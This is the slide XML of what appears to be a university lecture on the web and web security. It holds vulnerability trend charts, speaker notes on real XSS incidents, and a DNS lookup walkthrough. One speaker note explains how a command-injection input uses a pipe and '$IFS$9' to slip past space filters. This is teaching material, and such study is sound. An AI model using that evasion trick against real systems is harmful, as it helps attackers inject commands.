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1675" r:id="rId3"/>
    <p:sldId id="1635" r:id="rId4"/>
    <p:sldId id="1634" r:id="rId5"/>
    <p:sldId id="1677" r:id="rId6"/>
    <p:sldId id="1636" r:id="rId7"/>
    <p:sldId id="1558" r:id="rId8"/>
    <p:sldId id="1579" r:id="rId9"/>
    <p:sldId id="1578" r:id="rId10"/>
    <p:sldId id="1637" r:id="rId11"/>
    <p:sldId id="1640" r:id="rId12"/>
    <p:sldId id="1638" r:id="rId13"/>
    <p:sldId id="1639" r:id="rId14"/>
    <p:sldId id="1678" r:id="rId15"/>
    <p:sldId id="1591" r:id="rId16"/>
    <p:sldId id="1679" r:id="rId17"/>
    <p:sldId id="1621" r:id="rId18"/>
    <p:sldId id="1627" r:id="rId19"/>
    <p:sldId id="1630" r:id="rId20"/>
    <p:sldId id="1622" r:id="rId21"/>
    <p:sldId id="1623" r:id="rId22"/>
    <p:sldId id="1641" r:id="rId23"/>
    <p:sldId id="337" r:id="rId24"/>
    <p:sldId id="340" r:id="rId25"/>
    <p:sldId id="343" r:id="rId26"/>
    <p:sldId id="287" r:id="rId27"/>
    <p:sldId id="341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10" r:id="rId39"/>
    <p:sldId id="311" r:id="rId40"/>
    <p:sldId id="347" r:id="rId41"/>
    <p:sldId id="313" r:id="rId42"/>
    <p:sldId id="314" r:id="rId43"/>
    <p:sldId id="315" r:id="rId44"/>
    <p:sldId id="317" r:id="rId45"/>
    <p:sldId id="318" r:id="rId46"/>
    <p:sldId id="316" r:id="rId47"/>
    <p:sldId id="559" r:id="rId48"/>
    <p:sldId id="1292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70" autoAdjust="0"/>
    <p:restoredTop sz="89048" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="113" d="100"/>
          <a:sy n="113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257</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>404</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>498</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>381</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>581</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>839</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>899</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>1105</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>895</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>1034</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>1097</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>1219</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>1422</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>1463</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>1600</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>1803</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>2036</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>3173</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>1975</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>1503</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>1295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87-9746-9530-63BB285E9D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Overflow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206</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>296</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>430</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>362</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>403</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>646</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>645</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>902</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>658</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>638</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>493</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>457</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>473</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>411</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>409</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>412</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>483</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>1156</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>1614</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>960</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>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87-9746-9530-63BB285E9D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XSS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1">
                  <c:v>9</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>115</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>125</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>287</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>788</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>1288</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>875</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>818</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>874</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>651</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>545</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>780</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>661</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>1175</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>828</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>478</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>1129</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>1554</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>2023</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>1567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87-9746-9530-63BB285E9DB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SQL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0">
                  <c:v>16</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>56</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>106</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>78</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>180</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>691</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>1088</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>833</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>1174</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>1056</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>606</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>369</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>366</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>269</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>478</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>389</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>253</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>692</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>732</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>820</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>649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587-9746-9530-63BB285E9DB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CSRF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</c:numCache>
            </c:numRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Sheet1!$F$2:$F$22</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="21"/>
                <c:pt idx="2">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>18</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>69</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>85</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>116</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>85</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>58</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>179</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>142</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>308</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>271</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>85</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>293</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>436</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>498</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>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87-9746-9530-63BB285E9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1229919"/>
        <c:axId val="761233263"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="76122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233263"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="7612332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229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30864197530864"/>
          <c:y val="9.3134432414698168E-2"/>
          <c:w val="0.12923580732963935"/>
          <c:h val="0.35738640091863516"/>
        </c:manualLayout>
      </c:layout>
      <c:overlay val="0"/>
      <c:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1"/>
        </a:solidFill>
        <a:ln w="12700">
          <a:solidFill>
            <a:srgbClr val="0070C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Injection (O1)</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>CSRF</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>Broken Access Control (O5)</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>Broken Authentication (O2)</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>XSS (O7)</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>Misconfigurations (O6)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0.28999999999999998</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>0.34</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0.37</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0.45</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>0.53</c:v>
                </c:pt>
                <c:pt idx="5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C9-5D4E-91AF-0CC1771DCD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58615823"/>
        <c:axId val="758622863"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="7586158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22863"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="7586228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8615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8-7B4D-8133-AB309D9C3461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8-7B4D-8133-AB309D9C3461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8-7B4D-8133-AB309D9C3461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68-7B4D-8133-AB309D9C3461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68-7B4D-8133-AB309D9C3461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68-7B4D-8133-AB309D9C3461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568-7B4D-8133-AB309D9C3461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68-7B4D-8133-AB309D9C3461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68-7B4D-8133-AB309D9C3461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568-7B4D-8133-AB309D9C3461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568-7B4D-8133-AB309D9C3461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568-7B4D-8133-AB309D9C3461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68-7B4D-8133-AB309D9C3461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568-7B4D-8133-AB309D9C3461}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:bandFmts/>
        <c:axId val="2125893432"/>
        <c:axId val="2125898968"/>
        <c:axId val="2125904328"/>
      </c:surface3DChart>
      <c:catAx>
        <c:axId val="2125893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5.2387279232668359E-2"/>
              <c:y val="0.8776655418072740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5898968"/>
        <c:crosses val="autoZero"/>
        <c:auto val="1"/>
        <c:lblAlgn val="ctr"/>
        <c:lblOffset val="100"/>
        <c:noMultiLvlLbl val="0"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="2125898968"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="17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5893432"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="midCat"/>
        <c:majorUnit val="2000"/>
        <c:minorUnit val="500"/>
      </c:valAx>
      <c:serAx>
        <c:axId val="212590432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6763937003497398"/>
              <c:y val="0.87945444319460064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5898968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www.summithosting.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/blog/picturing-the-internet/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23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60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61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8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7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nvd.nist.gov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/vuln/search</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>keywords: "denial", "overflow", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>", ,"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>csrf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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75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www.ptsecurity.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ww-en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/analytics/web-vulnerabilities-2020/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr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Hackers can attack users in 9 out of 10 web applications.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Attacks include redirecting users to a hacker-controlled resource, stealing credentials in phishing attacks, and infecting computers with malware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base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Unauthorized access to applications is possible on 39 percent of sites.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2019, full control of the system could be obtained on 16 percent of web applications. On 8 percent of systems, full control of the web application server allowed attacking the local network.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47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www.ptsecurity.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ww-en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/analytics/web-vulnerabilities-2020/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minesweeper in </a:t>
            </a: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92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scripts can be imported from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> remote origins, have </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>privilieges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> of imported page (not source)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1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Samy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> worm (2005):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Yahoo mail (2016): https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nakedsecurity.sophos.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/2016/01/21/xss-bug-in-yahoo-mail-could-have-let-attackers-take-over-email-accounts/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stored XSS on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (2017):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malicious sellers added scripts to legitimate product listings to redirect users to a spoofed login page that harvested credentials before redirecting users back to a legitimate eBay page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>news.netcraft.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/archives/2017/02/17/hackers-still-exploiting-ebays-stored-xss-vulnerabilities-in-2017.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Expandable ads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> (2018): https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>threatpost.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>/once-popular-online-ad-format-opens-top-tier-sites-to-xss-attacks/137681/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Wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (2018): create admin account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.bleepingcomputer.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/news/security/active-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-attacks-targeting-amp-for-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-plugin/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5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49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| is pipe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$IFS is environment variable for inter-command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>separater</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (by default, space), $9 is ninth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (always empty string)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52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57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35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Q: Why not centralize?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Single point of failure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Traffic volume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Distant Centralized Database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Maintenance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A: Does not scale!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security?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7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0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57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4/28/21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omona.edu/~ebirrell/classes/cs105/2019fa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omona.edu/~ebirrell/classes/cs105/2019fa/index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rfc/rfc2396.tx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pomona.edu/~ebirrell/classes/cs105/2019fa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s.pomona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                  Spring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28: Web and Web Security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2237-80CB-F343-89AA-39D5AA8FB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C3828-63BA-7A49-A40F-286EB9E882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Distributed, hierarchical database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Application-level protocol:   hosts and DNS servers communicate to resolve    names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Names are separated into components by dots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>lookup occurs top down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5B421ECF-B62B-AF48-9286-494C3C722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820" y="2187365"/>
            <a:ext cx="60771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.net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EA248740-37CF-F34E-AAB7-68E2199395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94458" y="1595227"/>
            <a:ext cx="1476375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33110B12-EE30-F940-9487-497326210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6445" y="2187365"/>
            <a:ext cx="659135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edu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DA78260B-075A-704B-89FD-A247A5C8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820" y="2187365"/>
            <a:ext cx="63496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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>gov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E3725BAE-0F18-D248-8EDF-28AFF91C6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270" y="2187365"/>
            <a:ext cx="705942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.com</a:t>
            </a:r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B1713DF6-0A44-4A45-ADC3-B29490865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9670" y="1595227"/>
            <a:ext cx="411163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EB11B4CE-640E-D74E-A559-F58E5928F2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70833" y="1595227"/>
            <a:ext cx="425450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22F2A853-6DB4-1547-AEA9-78B79A4E54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70833" y="1595227"/>
            <a:ext cx="1363662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FF8C0132-4F01-0343-BDBF-39A9AAFFA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589" y="3116052"/>
            <a:ext cx="1051871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pomona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493F2A3F-A5F2-C546-AE20-04340D697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870" y="3116052"/>
            <a:ext cx="91273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scripps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799377C-E701-7D4D-B5F4-1DF485775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061" y="3126456"/>
            <a:ext cx="63348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hmc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8C0F3027-40A2-BA4E-9CE1-3E5A1850B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470" y="2523915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9AC41F9D-F301-0B4B-804F-A27FF3E7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00" y="4044740"/>
            <a:ext cx="394640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E8349371-21A3-ED43-AC7E-D4198765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204" y="4044740"/>
            <a:ext cx="732103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math</a:t>
            </a:r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713284F9-009F-2748-AF97-D1F6F08FBC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0925" y="3452602"/>
            <a:ext cx="668338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5675E26E-258A-9448-BDE9-3B03A61721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02026" y="2519152"/>
            <a:ext cx="1781444" cy="65176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0" name="Line 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EB0149D-73CF-8647-AB0E-3BE5E7824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6646" y="2496927"/>
            <a:ext cx="627422" cy="6739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1" name="Line 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{438D5DF9-77ED-1E4E-93C8-43F0D95B41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0363" y="3452602"/>
            <a:ext cx="690562" cy="592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80438D84-41DE-304C-B352-6FF89F3DB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0292" y="4486394"/>
            <a:ext cx="12700" cy="604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A012293E-8AC5-2D4B-8E26-1E446B8AF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850" y="5070594"/>
            <a:ext cx="1484682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dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>134.173.66.214</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text Box 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2706C664-2014-3F44-92AF-27FB989FE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5145" y="3128752"/>
            <a:ext cx="102025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amazon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5" name="Line 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDB581D4-BD3C-7D4C-A4E2-40CB97052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370" y="2498515"/>
            <a:ext cx="406400" cy="630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6" name="Line 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E0BE53D-4513-3D4B-AFD2-100259CD71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7270" y="3489115"/>
            <a:ext cx="0" cy="592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27" name="Text Box 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B66E6E48-6C68-7044-A5CE-31968FFA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215" y="4058128"/>
            <a:ext cx="1379985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>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>www</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="912813"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>176.32.98.166</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Box 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13031F15-37CA-5C47-A704-8C6B4BFD6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270" y="3128752"/>
            <a:ext cx="633487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cmc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F63A5503-D1E1-B042-9569-A15DCB9EAC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6700" y="2519152"/>
            <a:ext cx="1004174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6058F714-F0AE-B141-8BEC-BD186D8D6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311" y="3106527"/>
            <a:ext cx="778399" cy="4001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algn="ctr" defTabSz="912813"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pitzer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1" name="Line 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4CEC2DC-2D8A-2E43-A226-3D1D6C835F9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0295" y="2496927"/>
            <a:ext cx="1456555" cy="708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577" tIns="45789" rIns="91577" bIns="45789"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7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F939-13CA-6648-9448-0A8A23F7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9BB5-83CB-7542-84FC-A142CCA3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client asks its local nameserver </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the local nameserver asks one of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>root nameservers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1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CBBF13-497F-D54A-BF7D-171515F91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Root Name Servers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A7A6D8-DE37-224B-BDA1-54B04E77E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contacted by local name server that can't resolve name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>owned by Internet Corporation for Assigned Names &amp; Numbers (ICANN)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>contacts authoritative name server if name mapping not known, gets mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>returns mapping to local name server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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4264C5E-C1DF-F748-A29F-4206E5408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8229600" cy="30380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1E492A-01F6-9F41-8801-D4A12A09AB83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8458200" y="5981700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44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F939-13CA-6648-9448-0A8A23F7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Lookup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9BB5-83CB-7542-84FC-A142CCA3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client asks its local nameserver </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the local nameserver asks one of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>root nameservers </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the root nameserver replies with the address of the top level nameserver </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the server then queries that nameserver </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the top level nameserver replies with the address of the authoritative nameserver </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the server then queries that nameserver </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>repeat until host is reached, cache result. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: Client wants IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.amazon.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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root server to find com DNS server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.com DNS server to get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>amazon.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> DNS server 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Queries </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>amazon.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
